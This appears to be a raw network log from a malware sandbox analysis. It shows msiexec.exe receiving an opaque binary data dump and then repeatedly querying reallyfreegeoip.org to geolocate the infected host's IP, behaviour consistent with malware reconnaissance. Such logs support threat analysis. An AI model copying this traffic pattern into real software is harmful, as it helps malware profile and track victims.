                                                                                                                                          2025-01-08 15:21:21 UTC1323INData Raw: aa 26 45 27 9c 72 8f 23 b3 6d 3c 5c 4e 22 09 f3 08 9e 1d 17 f0 22 df 23 53 b6 ef 9d 8e c2 39 f3 95 51 42 e9 b5 d6 ac c4 2e 73 0e e0 ed 44 79 eb 20 71 23 a6 c3 70 ac c1 32 a5 e0 75 fc 82 f4 d1 4a 91 fa 40 6a 89 eb 5d 2f 29 a8 e6 47 20 ba e3 43 82 fe 59 db 65 c2 f5 4a 86 e2 3f de 34 98 dd 09 c8 f2 2a 89 83 ea 64 4b dc de 48 94 0e 01 bc 1e a8 da 97 ac e4 f5 01 49 d8 c9 72 d5 c9 fa d5 29 23 be 73 5b 90 89 d6 b6 ad 5a 94 12 6e 28 71 17 58 81 be d4 c5 01 f9 cf 89 23 e4 3a 80 e6 2e 2c 37 db a2 55 28 1f 7b 07 dd b1 ee 1e dc 19 2f 8f d2 ff 69 17 9c 12 0d 99 42 a0 0b ef 4d f2 3d 9a f1 11 f2 92 ee 28 05 8b 98 02 2c 5a 81 ca 03 8b a9 fd 5c d5 1d 6a e0 c7 8a 97 d8 ca ee 40 aa 6b ce 61 d8 f5 4d ce ee 9a 4a 68 90 19 7a b2 d4 41 10 d5 7b 72 ca d4 a6 23 e6 af fe 65 12 19
                                                                                                                                          Data Ascii: &E'r#m<\N""#S9QB.sDy q#p2uJ@j]/)G CYeJ?4*dKHIr)#s[Zn(qX#:.,7U({/iBM=(,Z\j@kaMJhzA{r#e
                                                                                                                                          2025-01-08 15:21:21 UTC1390INData Raw: e7 20 71 55 df ee cd 32 12 cf e7 0d 6a ab 2a b9 e6 fb 55 b1 a7 95 c2 77 cb 2e dc ef c6 ad c3 71 1a 2e 7a 58 a4 87 25 2d 18 cb cf a7 9c 1a ef be ff 68 a3 db 31 f8 3a a0 05 df 0c c1 4b 07 6c cc f6 e3 2b 16 99 44 a5 fb ac b7 77 f5 87 6b cd bf 47 f2 c7 0e 9f d5 d2 5b 9d 31 07 2c 5b f1 11 1a 5b a1 7f 9a 9a 4e 79 ea ee d1 bf 84 76 72 c2 e3 fa b7 31 48 6d f1 7d 12 96 42 70 e7 0d ab ec 21 a5 4f 31 2f e6 40 b8 a8 20 9b 64 ac d4 fd 19 90 01 82 4d b4 32 59 e1 a4 b4 96 68 68 79 99 c4 36 32 8d 33 65 87 9a 4e 95 aa 22 67 cc bf 15 25 38 91 e5 2d 18 90 22 0e 17 e1 49 9c 6b bc d9 fa df ef 72 a2 f3 ec 58 5a bb b0 7e a4 c6 7e 56 1e af 67 18 b6 98 03 a6 f3 c1 d3 2f 84 38 51 23 ea d4 9d a5 89 e7 36 f8 67 ef cd 8d 20 45 b2 e0 d5 12 4d 24 10 e6 be 4b de a1 7d e8 62 75 86 6d 7f
                                                                                                                                          Data Ascii: qU2j*Uw.q.zX%-h1:Kl+DwkG[1,[[Nyvr1Hm}Bp!O1/@ dM2Yhhy623eN"g%8-"IkrXZ~~Vg/8Q#6g EM$K}bum
                                                                                                                                          2025-01-08 15:21:21 UTC1390INData Raw: e9 c4 fe 43 1e a9 0a df cd 7b f6 b5 44 66 fd ba c5 6d de 36 95 38 71 5f a2 34 eb f5 21 b7 80 c7 4d 85 94 7f 12 51 11 c1 f8 cd 20 cb 90 ee 1d b5 52 59 26 7c b7 bd 3f fb a7 7f c3 5d 20 f4 0f e2 a3 8c 19 3c fe 80 4f a2 4b 44 b7 d3 0e 76 31 9c 26 69 a7 a2 b4 79 51 63 a3 d2 28 e6 4c c3 c9 70 dd 88 87 a9 bf 42 31 4a 80 fe 87 22 e6 26 e8 10 79 39 38 7b c9 b8 bb ec 4e a2 c5 d7 f7 98 c9 29 3e 4a 92 12 b8 bd 30 32 e1 00 cf c0 e1 45 91 d4 24 4e 20 10 12 b9 9f b9 ee ff 79 42 d2 1d 5b f3 db e7 c2 8f b8 82 5d f2 3b 21 25 6c d3 08 a6 52 f7 fb fb d3 c3 9f d0 81 81 f6 3d 60 cc ba c9 1d 64 fd e8 b4 22 3b 7d e0 fc 17 f2 87 0d 34 4b 2b d4 cf c1 4a fc 38 5d cb f9 b6 83 72 40 8c 6c b6 7b 02 01 9d e1 b0 0c bd eb 19 a7 38 f8 61 1e 9f 14 b8 f4 7d c5 7c 40 7f 79 b1 0b 65 6c a2 97
                                                                                                                                          Data Ascii: C{Dfm68q_4!MQ RY&|?] <OKDv1&iyQc(LpB1J"&y98{N)>J02E$N yB[];!%lR=`d";}4K+J8]r@l{8a}|@yel
                                                                                                                                          2025-01-08 15:21:21 UTC1390INData Raw: 7f fc 4a d5 e5 36 19 b4 f0 51 8b c9 28 6f d3 8b 0a 4f 98 cd 0c 37 3e 46 bb 14 05 cf ff 8d c8 1c 85 12 c0 89 75 9d 77 7b 09 b6 8c da cc e9 37 e2 9d e1 95 7c 22 1b 22 da 9d fb 20 76 d0 8b 15 e7 44 12 a8 ac 39 bf e5 9c 95 a6 58 c9 5f cd de 36 56 45 89 46 59 1f 10 06 2f 01 fd 39 d4 8e e8 08 2a f9 4d e8 31 a7 bc ab 77 86 c9 62 40 1f 7a 81 0a 97 a8 96 e1 ea e1 3c d5 cc 82 6e 63 42 54 83 79 53 2c 27 ea 44 96 95 c6 be 53 82 89 55 f5 3e 5b 3f e8 d6 7b 6e 97 6a 26 37 79 2b d3 d0 21 37 a0 f7 b5 ef 89 69 c2 27 6b 94 ff 84 e0 46 35 4b 13 63 6f a2 4e 4c 02 71 11 a4 56 f0 fd 9b 64 08 a5 92 c6 19 6a ea 06 e8 df e3 d4 b2 84 c3 20 22 96 61 ef c9 a4 e2 11 ec 64 51 30 c8 81 ec 15 a0 16 37 d6 f6 b6 04 e8 c5 11 d2 05 59 5a e4 29 dc 17 55 c1 97 6e 40 75 d9 47 a8 c9 33 81 65 e8
                                                                                                                                          Data Ascii: J6Q(oO7>Fuw{7|"" vD9X_6VEFY/9*M1wb@z<ncBTyS,'DSU>[?{nj&7y+!7i'kF5KcoNLqVdj "adQ07YZ)Un@uG3e
                                                                                                                                          2025-01-08 15:21:21 UTC1390INData Raw: 59 86 40 47 c1 d0 1d 44 46 37 88 ea 5b 76 77 f4 3f e0 93 0e d1 dd da 18 95 37 16 e5 54 eb fc 90 a4 fb 0b f1 3e e1 0a 0a 3b bc ba 48 e3 99 b2 95 90 b8 37 7a 3e c1 c8 83 5d ab d8 d6 1a 87 f2 6e 50 08 f8 e1 45 eb 9a 67 2d 12 b0 4e b9 3b 8a 3f 74 02 27 00 b9 35 e3 e3 97 cf c0 4f 3e 97 85 4e 89 81 b7 98 be e1 08 ba b9 65 e0 67 5d f0 3e 17 8e 46 02 f9 7c 57 3b 09 3a 2b 96 ce ec 00 f6 7d 97 10 20 7b 92 64 ff f2 b2 c6 80 f3 b9 ac 74 fb ca 32 01 73 9c 6d fc 06 33 4a 47 e1 c6 f0 c4 52 b2 a3 91 f1 45 ab 80 9b ef ae 38 f7 c4 ed 3c 1e d9 03 c8 5a 47 c4 82 0a b1 3b 37 98 9e 30 a5 f2 91 d8 34 63 fa 92 8c ff 41 8a eb fd a0 9b e5 dc b5 eb bd 86 18 0d 1a 0b 22 ab d8 d4 ad a9 aa ae 9e 8c d3 14 eb e7 71 cf 1a 40 f9 88 ac 9f c3 cd d5 dc 71 e1 76 1f 5a f3 46 2b d6 83 d3 46 0e
                                                                                                                                          Data Ascii: Y@GDF7[vw?7T>;H7z>]nPEg-N;?t'5O>Neg]>F|W;:+} {dt2sm3JGRE8<ZG;704cA"q@qvZF+F
                                                                                                                                          2025-01-08 15:21:21 UTC1390INData Raw: 4f ef ee c9 19 05 51 99 68 7f b3 91 34 8b 93 3a c2 d7 f2 54 9f 09 9f c3 18 94 0b 5e 00 30 55 a9 73 1e 71 bc 73 28 ce f5 c6 d5 a2 45 fe 20 4e 38 7e 2f 31 e9 a3 c6 5e 44 fc 50 8e 0d 51 e7 6e be 2c d5 03 c6 69 cc 2f 19 17 85 d4 39 9e e7 63 90 90 73 a2 4a c5 bc 62 c6 60 b8 d4 a6 00 4f c5 76 04 ad 2d 80 f5 90 1c a3 e7 b6 4c 7f 19 13 0d 76 69 47 59 c9 50 df 50 c4 9d 75 47 f3 08 74 fa 4e 42 83 24 c3 ba d8 fa 26 19 fe 08 65 da b4 7e 34 fe eb c6 bd b0 d9 bf c5 24 15 4e 92 3d 02 51 b7 fc 13 50 64 18 1c 2e 70 4f 7e 20 1a ce 6c 19 f0 45 21 6a 59 4e 2b 99 a5 5d cc 55 fb 97 76 7a e7 17 02 df 05 09 d3 e4 d9 1b 8e 3a 86 a4 1d 40 09 11 a4 65 51 9a 7b 6f 68 51 9d 7a 0a a4 cb 82 8c 7b 92 35 0e d5 55 e9 05 0b e0 8f 43 dc eb 46 f1 98 00 8a ec b4 38 47 0d 67 a5 e1 7e 97 94 82
                                                                                                                                          Data Ascii: OQh4:T^0Usqs(E N8~/1^DPQn,i/9csJb`Ov-LviGYPPuGtNB$&e~4$N=QPd.pO~ lE!jYN+]Uvz:@eQ{ohQz{5UCF8Gg~
                                                                                                                                          2025-01-08 15:21:21 UTC1390INData Raw: 65 6d 4c f4 6b 11 48 7e 48 94 00 9b 95 34 ad b0 66 a0 ed 53 a4 d5 61 ea b0 46 60 f0 90 ce d4 98 1d 6b 0c c4 c7 5d 21 f2 05 68 57 3c e6 6a da 0f 05 bf e2 7d db fe 84 73 65 28 ac 16 6a 89 e5 ec 15 47 e2 49 48 50 b4 5e 6b fe fa 71 98 0a 9e ff 38 4c fd 37 a7 92 b2 b7 66 0b e3 35 92 96 c2 29 24 1a d8 48 43 62 04 ad 1a 84 e4 aa 22 8d 90 4c 69 d8 eb 10 c4 cd 9f ba 29 23 b4 73 85 e0 bd c7 b2 85 20 d2 14 01 59 67 3f da 81 62 00 c0 da d0 e8 a8 32 cf 10 4b e6 06 4e 1f 81 a8 88 4a 04 f6 47 dd b1 ef 45 f8 6b 1b 9d a0 d8 c9 32 fb 2c 9e 11 42 aa a3 dc ab 81 a8 93 e0 67 69 74 f5 56 3d f5 b7 06 8e 7b e9 89 3a 88 d9 9b d6 78 06 14 ca d1 74 92 69 e8 e3 35 d3 4d cf 11 7a dd 25 30 e8 ad 25 34 96 6a b7 a1 f6 50 b5 5d 7b 72 c1 f1 c3 98 b4 b8 f4 06 b8 2d 11 bd 48 1b 62 31 7d c4
                                                                                                                                          Data Ascii: emLkH~H4fSaF`k]!hW<j}se(jGIHP^kq8L7f5)$HCb"Li)#s Yg?b2KNJGEk2,BgitV={:xti5Mz%0%4jP]{r-Hb1}
                                                                                                                                          2025-01-08 15:21:21 UTC1390INData Raw: ff f1 d8 0f bf 37 d0 97 06 e1 e2 c3 45 88 57 78 6b 5b 81 01 32 0e 20 7e 90 8c 95 50 cd e7 c0 bc bb 65 63 e2 96 95 66 3b 96 67 f1 7d 39 9d 3c 55 ef 1b c0 4f 76 a7 45 41 39 df c0 c6 96 2a 8d 9e 85 15 dd 08 ba 57 9f 4d b4 38 71 aa ac ca a6 75 e5 3d e7 ff 37 17 9f 32 ca 88 9a 34 58 5b 35 4f 7d bf 04 27 8b b3 92 8a 9e 9f 28 7e a4 c3 3f 34 53 bc d3 fe a3 da 4d f8 6d e3 58 20 0a 9f 65 f2 8e 7e 56 10 d3 42 04 c4 20 72 88 83 63 ff 21 54 28 5b 3c a0 fc 15 af 9a cc 3b 8b 26 fc c6 9d 0e 6a f9 0d c7 12 3d 92 cb f7 ab f0 de a7 04 8d 47 6d fe c3 b8 21 ee 3c 43 13 52 38 7c 24 55 bc 24 f5 e6 e1 7d 83 65 eb f7 47 0a c8 5a 1d 91 72 8b 01 01 f8 7c 84 65 ad b2 04 af 0a d6 24 24 42 9d 86 0e 82 30 0e 32 3d 01 67 e7 13 97 42 77 ed 54 68 0a 20 85 da 13 a7 b0 2d 48 2c 5a 4d 0b 91
                                                                                                                                          Data Ascii: 7EWxk[2 ~Pecf;g}9<UOvEA9*WM8qu=724X[5O}'(~?4SMmX e~VB rc!T([<;&j=Gm!<CR8|$U$}eGZr|e$$B02=gBwTh -H,ZM


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.849712188.114.97.34433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 15:21:24 UTC853INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:24 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1664473
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FpMzmv6L0iJR6QLJ35B38ZgODs5zDH1G6HewlpIGKW4o5k1Iz6q2EPNkqBRtVrTabdO5WMLdYR%2FzC2IPWntglfyexMPQnFSlUh81vmm2OEFsERpnlh%2BAkBV9REsiCFgz4IbLmV4q"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fed2d578f23726e-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=2064&rtt_var=777&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1414728&cwnd=224&unsent_bytes=0&cid=ccd6d2ce012b79f0&ts=169&x=0"
                                                                                                                                          2025-01-08 15:21:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.849713188.114.97.34433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:25 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-08 15:21:25 UTC855INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:25 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1664474
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Bao08XMCsDr1gtoeGcmCFIRTJd7P2GDJTDSg%2ByFntElbsTlpF4mwfEf7jNiZt9T4Dbg0fp1wFCNlK2oxtvMcDmcJJeh8qY%2F43cKgQUWnSfwZWVFWFtkMM5dNMJW%2BJQx30C8Sioo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fed2d5d4d38c42c-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1493&rtt_var=573&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1886304&cwnd=232&unsent_bytes=0&cid=fa149766868e5972&ts=168&x=0"
                                                                                                                                          2025-01-08 15:21:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.849715188.114.97.34433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:26 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 15:21:26 UTC855INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:26 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1664475
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NO3WLc2k%2F4B0RspMSjUUdloFjB4N%2FL00b0MKOos32hOtPFlqlqZDs3F9JAPflDKBRdo8NYz5xpBzodyFgPLa%2B5EhFSsGrzBGPxIfltKo8FWXc0jKPskwAdYEaxDip1Wn88Xb7aSV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fed2d667b40431a-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2414&min_rtt=2410&rtt_var=912&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1195251&cwnd=224&unsent_bytes=0&cid=7e385c0233121653&ts=143&x=0"
                                                                                                                                          2025-01-08 15:21:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.849717188.114.97.34433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:28 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 15:21:28 UTC855INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:28 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1664477
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IWTn1MOLV4Z2CNVVe9HU6wEa7aW6Lna3BvX1AXNmGOfOVUcb6P03DvHbO8IiPi6KXiQu%2BRX9bT4CIaiZ818%2F4dWEY8uyT4wSvSxr0DyM5ZzZAyBfb3cF%2BYBWCEYtSE0G0kNzVB5U"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fed2d7169536a5e-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1699&rtt_var=648&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1676234&cwnd=188&unsent_bytes=0&cid=dc72639c2f45d71a&ts=166&x=0"
                                                                                                                                          2025-01-08 15:21:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.849719188.114.97.34433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:30 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          2025-01-08 15:21:30 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:30 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1664479
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UdTZR49IgyEmIwH3LN5Th5LEKNAd%2BJCUGWIx5X7wCHJzy%2Fv3PXXd6Uuhm%2FF34oZAG8RP48lGgSlqLNAl37cHS4Ogg%2BnXfokUXPvZhxucihkTAZVasUT7yGZDDmJLesYY8kDaRiww"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fed2d7b3ff9de98-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1457&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1898569&cwnd=212&unsent_bytes=0&cid=a291ecb97c8fa20a&ts=154&x=0"
                                                                                                                                          2025-01-08 15:21:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.849721188.114.97.34433504C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-08 15:21:31 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-08 15:21:31 UTC857INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 08 Jan 2025 15:21:31 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1664480
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
